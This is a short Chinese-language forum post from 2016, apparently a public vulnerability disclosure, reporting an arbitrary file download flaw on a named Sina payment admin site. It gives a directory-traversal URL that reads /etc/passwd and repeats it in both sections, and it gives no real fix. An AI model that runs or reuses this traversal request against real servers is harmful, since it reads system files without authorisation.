HanDs
管理员

[7月漏洞公开] 新浪某站存在任意文件下载漏洞 



新浪某站存在任意文件下载漏洞

详细说明:

新浪某站存在任意文件下载漏洞

网站地址:http://admin.pay.sina.com



code 区域
http://admin.pay.sina.com/..//..//..//..//..///etc/passwd





12.jpg





13.jpg



好了,就这些了



漏洞证明:

新浪某站存在任意文件下载漏洞

网站地址:http://admin.pay.sina.com



code 区域
http://admin.pay.sina.com/..//..//..//..//..///etc/passwd





12.jpg





13.jpg



好了,就这些了

修复方案:

你懂的


学习中请遵守法律法规,本网站内容均来自于互联网,本网站不负担法律责任
新浪 存在 任意 文件下载 漏洞
#1楼
发帖时间:2016-7-9   |   查看数:0   |   回复数:0
游客组
快速回复